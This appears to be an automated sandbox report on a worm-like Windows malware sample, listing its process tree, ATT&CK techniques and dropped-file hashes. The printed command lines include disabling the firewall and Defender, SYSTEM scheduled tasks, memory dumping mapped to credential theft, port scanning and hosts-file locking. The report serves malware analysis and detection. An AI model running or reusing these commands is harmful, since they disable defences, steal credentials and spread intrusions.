    schtasks /create /sc minute /mo 1 /tn "qjtubdvbc" /ru system /tr "cmd /c C:\Windows\ime\tbutbbj.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1536
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "buccbntqu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bptuvtrj\tbutbbj.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2676
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4704
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "buccbntqu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bptuvtrj\tbutbbj.exe /p everyone:F"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1552
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mbnnkqzuc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\hnmbtkiin\iakeqk.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3380
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "mbnnkqzuc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\hnmbtkiin\iakeqk.exe /p everyone:F"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1940
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:4884
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2924
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4872
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2148
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:2220
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:5068
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:3932
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:3060
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2936
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4620
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:2788
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:2404
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 796 C:\Windows\TEMP\vieiitfbt\796.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4840
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4972
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4900
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      System Location Discovery: System Language Discovery
      PID:4528
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4296
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:3736
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  PID:3468
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:4616
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4220
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1696
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      System Location Discovery: System Language Discovery
      PID:3340
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  PID:3636
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1792
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      System Location Discovery: System Language Discovery
      PID:5100
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4024
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    PID:4640
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      System Location Discovery: System Language Discovery
      PID:1912
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3984
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:4048
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  PID:1828
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    PID:2000
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:672
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:1080
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3020
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    PID:548
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4756
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 384 C:\Windows\TEMP\vieiitfbt\384.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1488
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 2100 C:\Windows\TEMP\vieiitfbt\2100.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:780
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 2600 C:\Windows\TEMP\vieiitfbt\2600.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1472
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 2956 C:\Windows\TEMP\vieiitfbt\2956.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2412
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 2964 C:\Windows\TEMP\vieiitfbt\2964.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3216
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 3100 C:\Windows\TEMP\vieiitfbt\3100.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4180
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 3780 C:\Windows\TEMP\vieiitfbt\3780.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2052
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 3868 C:\Windows\TEMP\vieiitfbt\3868.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1480
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 3936 C:\Windows\TEMP\vieiitfbt\3936.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:812
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 4032 C:\Windows\TEMP\vieiitfbt\4032.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1792
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 3588 C:\Windows\TEMP\vieiitfbt\3588.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:816
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 3944 C:\Windows\TEMP\vieiitfbt\3944.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3420
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 4532 C:\Windows\TEMP\vieiitfbt\4532.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3948
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 4492 C:\Windows\TEMP\vieiitfbt\4492.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3844
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\vieiitfbt\tbntqyuzn\scan.bat
  2⤵
  PID:4080
- - C:\Windows\vieiitfbt\tbntqyuzn\qwttvniyq.exe
    qwttvniyq.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:1408
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1464
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2756
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4872
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4116
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5192
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4700
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5888

C:\Windows\SysWOW64\mesuau.exe
C:\Windows\SysWOW64\mesuau.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4712

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\tbutbbj.exe
1⤵
PID:784
- C:\Windows\ime\tbutbbj.exe
  C:\Windows\ime\tbutbbj.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2972

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\hnmbtkiin\iakeqk.exe /p everyone:F
1⤵
PID:1100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:1740
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\hnmbtkiin\iakeqk.exe /p everyone:F
  2⤵
  PID:2736

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\bptuvtrj\tbutbbj.exe /p everyone:F
1⤵
PID:3144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:2856
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\bptuvtrj\tbutbbj.exe /p everyone:F
  2⤵
  PID:2148

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\tbutbbj.exe
1⤵
PID:5452
- C:\Windows\ime\tbutbbj.exe
  C:\Windows\ime\tbutbbj.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4484

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\hnmbtkiin\iakeqk.exe /p everyone:F
1⤵
PID:2052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:5532
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\hnmbtkiin\iakeqk.exe /p everyone:F
  2⤵
  PID:5404

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\bptuvtrj\tbutbbj.exe /p everyone:F
1⤵
PID:3092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:4272
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\bptuvtrj\tbutbbj.exe /p everyone:F
  2⤵
  PID:2460

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

OS Credential Dumping

T1003

LSASS Memory

T1003.001

Discovery

Network Service Discovery

T1046

Network Share Discovery

T1135

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\SysWOW64\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\TEMP\hnmbtkiin\config.json

Filesize
693B

MD5
f2d396833af4aea7b9afde89593ca56e

SHA1
08d8f699040d3ca94e9d46fc400e3feb4a18b96b

SHA256
d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

SHA512
2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

Download Submit
C:\Windows\TEMP\vieiitfbt\2100.dmp

Filesize
4.1MB

MD5
46de57cd22d90454f4c64f544019079b

SHA1
88c23586191da076b7f3ba62807d648636de4884

SHA256
e85d01636c16332dcb89d92e5e6a3fb1abb431a62df7774f236913445f034985

SHA512
fd4e3051684086c018bfcb2e54a1254ebbcb9fbadd21da030d16f8de024dd6b671169a54b273452b98a11397b0ce2cb0bfc69eb1f5c52e867a787974b1a2b46c

Download Submit
C:\Windows\TEMP\vieiitfbt\2600.dmp

Filesize
7.4MB

MD5
489a65d3dd951f0bf4c104f98e308bec

SHA1
5e2b2157d498533217da60564153e7784a9b2037

SHA256
7741c83bca9b66ab73efeed9230da60144a09352deb2e54715b6fcef61fe777d

SHA512
3ef5893de5ac97aca318db05aab0f0efc2964f2c98ff8c50b8be999c8f3b4f11133fa4a04291e6e1ca8cdcdb26d1cd290abfe69adf7be27b79c5bdea7bcd2326

Download Submit
C:\Windows\TEMP\vieiitfbt\2956.dmp

Filesize
3.8MB

MD5
8713665f5b43ae3a73824da1a9bc21bb

SHA1
373ab47527836c5ac266fbf596ee8dbb98ce83f9

SHA256
94b04d2b1ff390d9378ec744b7e96f8b0c712f2fd577ac8b5d33e7cfc4ceb236

SHA512
540e84fbed8ed7d2840fb8ed7979860e098a3410812856b39a599b30d7c31fa236051a1125078bd0ea88c9b1b3adba71c44b34b4b7a1dc5f6f18dac4813145b9

Download Submit
C:\Windows\TEMP\vieiitfbt\2964.dmp

Filesize
822KB

MD5
7004fc5f2fcdedaf766a7e30a8cd44e5

SHA1
4591afb0797055613ca5d1d37a9dff57034261cc

SHA256
fbb9a9e01109fb310facd9522a93e5d7592da64bc8d7519b24a3974e486a7584

SHA512
7a6dc14436d38995c8727341e85a89ea3cb8bee6a57140dc3c27f484d6bdcc14fc20a415050ed5a6f6d009da5870202001b319e7c1e1de106d01b2fd05e1043e

Download Submit
C:\Windows\TEMP\vieiitfbt\3100.dmp

Filesize
2.9MB

MD5
e570139298a55188b91c105b1434c8f9

SHA1
3e308c398bfbccd1b74f63fdc10d35d26300ac21

SHA256
0ece14129ed84856839e48a6f017d69bc4d3b3a88d18af02b3d5b34794be9ede

SHA512
a3d4d2676d795184221ac04603d6d749e02372bc8b3fe6c404b4175108886ae7e6a219448ba3535da465d5ccf9d163f4d4c546caa50f657c479742df4ab6fa7e

Download Submit
C:\Windows\TEMP\vieiitfbt\3588.dmp

Filesize
25.8MB

MD5
0ece782b5fca7f14223760b9d8bcdb74

SHA1
1ee035d8e403b99d508a52e40a00e123d429b3ca

SHA256
3b846d227d44b1789877f5415c90296f86586c96a9f5a4fd903a5b79002ed783

SHA512
6ef6f5fe084d51a1191db1d83e21be3c90d9ba2054dafcf32a076ef5c4c9595be4a9dd8f60a5823148de35fcf735d05deacafc9c5aec0835f8851931e5b61d69

Download Submit
C:\Windows\TEMP\vieiitfbt\3780.dmp

Filesize
2.7MB

MD5
dcaf6ac5b8ce036dd010b62d6f1c2e06

SHA1
d19e2edc49acaf9370e3f8af13f7f14791518dad

SHA256
3c75188e2ebf6009434e775f0b1f8d2cbedc09a5533257f544d3e3bc85755a1a

SHA512
0c6b88c2253f60e934155d77fcba8a4f2c435e1f7f8d24f210cee4fa7b2f988d8f0ff96f3b4b1eccaae82cd53bcedd6c930a512dc00982b75a035906d6bcbfd6

Download Submit
C:\Windows\TEMP\vieiitfbt\384.dmp

Filesize
33.3MB

MD5
9ab57041c2578ece48ae69e6c5059b12

SHA1
fe8dcb979ebbef32a4df579d9d157dc724adf6d2

SHA256
9805a6ee8c34d37bf985ac1f2fda568196adb90bc8226553ccfd231e7d7178cf

SHA512
87b16e522e0f4030a0cdc3531fa8e6f0470ab3290a203b924484ff8fc9ad693dc096f58ae0a9565f5d0c62f4a801c20176cdea811f904737a27a553841634010

Download Submit
C:\Windows\TEMP\vieiitfbt\3868.dmp

Filesize
20.6MB

MD5
007f01beaf70698c2ca0e2c896d3173a

SHA1
3c9d716bbb64b5b8e75da49b66b159cdb1c48da4

SHA256
a92e79dc37b3bf37d17c08b3dd05bb17a895210397b57cf9edaad4aca58b5f92

SHA512
78f582abf807516975df0a640037a1d3d2be9b4264750bbb72b78ef65c8f69853c03e9b2c0f0b8593d4b2a9038d596b2d087990d7255c22bd74907c12925fac6

Download Submit
C:\Windows\TEMP\vieiitfbt\3936.dmp

Filesize
3.9MB

MD5
b5c635b023b15d73dd18d1b47d03ea53

SHA1
a21c669fdf79ac90bdd487e75ad838b3917b76e5

SHA256
99a6b518965f7eb392f8b0f8278f4c1864b96d714f3b3bdba2675e01c3fa147c

SHA512
cdd1c1c7c20a9e412fb34bb01c7925f35d1a6ebcad64ddd5a3cb9b2615d32926bdcbfa7fc39b160b8b2eb00844952b818a17417287414eba2a0a26f1986588f0

Download Submit
C:\Windows\TEMP\vieiitfbt\3944.dmp

Filesize
1.2MB

MD5
6eed71fa130f03b83590d9d242ba77c7

SHA1
d96f9fd8bf27f0e8f89cd676f959314eae7fff19

SHA256
3b9d8196ca9cda51bd2275eb0f23b33945b54cd764122d38c91fe395c0a63bd4

SHA512
448d37017b515d339e1a57a5152a9bd5f3cc8c5cb00edf79006f10b3ccc93e65fde200318bb7f278cdc53823222ae0cda22896828f53d5dfbf864e84f7552644

Download Submit
C:\Windows\TEMP\vieiitfbt\4032.dmp

Filesize
45.5MB

MD5
29d69648cb7e7da469036d562cb4318e

SHA1
c3ef9d31bfcda5240ee24a6efe68587482adea13

SHA256
f91fe713cefdefbe3995c84ca8b62671cf485c5529859c1916485327dbe61ebe

SHA512
34ad66ec757fe533275e64d4862e7914b95f5600555aeebbd24a66a79cae05d054c87e22c21acbc4e37d6144aecea7c514c9a8cf4ed9f91665bfe36eae08040b

Download Submit
C:\Windows\TEMP\vieiitfbt\4532.dmp

Filesize
8.4MB

MD5
d6490a2c872980c550433ab102a915f2

SHA1
46ca2cbc4c5eee807a901d6611d9812b9b1258f7

SHA256
1a1ff318b6e69e8f0bb99f4732022710e6b3445e769a91a310b41e3c862839d3

SHA512
ecaafbc24afd848bfb090814cc2eb307530acefec9d68c71b0fda026179441fe26455adb55d71a21a5871da703905c5848066d1d929f3c1f3ac59354b1301b26

Download Submit
C:\Windows\TEMP\vieiitfbt\796.dmp

Filesize
1019KB

MD5
0598dea45cbc24585f662ab39fac1bff

SHA1
215563ee3d3c24e984060c66bdeda48c73df0771

SHA256
4adcf6c65b9ec5dbd549b8c8cf06f76f8317e2083896750aae75fdbfb2fb0ef8

SHA512
688e6933854220410cdbc09cf9b8eaa591174b2d67c9122240171ad7db9f1402829ffaff3bc811cbe7f7336fa107ecc02bb31e077369602ce206d5e123d7a35f

Download Submit
C:\Windows\Temp\hnmbtkiin\iakeqk.exe

Filesize
343KB

MD5
2b4ac7b362261cb3f6f9583751708064

SHA1
b93693b19ebc99da8a007fed1a45c01c5071fb7f

SHA256
a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

SHA512
c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

Download Submit
C:\Windows\Temp\nslED7F.tmp\System.dll

Filesize
11KB

MD5
2ae993a2ffec0c137eb51c8832691bcb

SHA1
98e0b37b7c14890f8a599f35678af5e9435906e1

SHA256
681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

SHA512
2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

Download Submit
C:\Windows\Temp\nslED7F.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\vieiitfbt\ypdiqfiui.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\xohudmc.exe

Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
C:\Windows\bptuvtrj\tbutbbj.exe

Filesize
17.5MB

MD5
469f94311557f8a38bcac7aa79bf4f4b

SHA1
30313bdae46b3ff4f96505ccd82c2927e9792996

SHA256
c9ad718dc6ee81405d8a14390fd0f34a0f57dce70cb26d2a897ec2fe75f2aaa7

SHA512
2a4be79e2489f36dc12458a160660d1c097119abc4d0e3c0351dd6e7c5e3bf58e6697ba43a9dababc26cc789f99958ee35bfa23400d33f7141b9951bbedd42b7

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
1KB

MD5
c838e174298c403c2bbdf3cb4bdbb597

SHA1
70eeb7dfad9488f14351415800e67454e2b4b95b

SHA256
1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

SHA512
c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

Download Submit
C:\Windows\vieiitfbt\Corporate\vfshost.exe

Filesize
381KB

MD5
fd5efccde59e94eec8bb2735aa577b2b

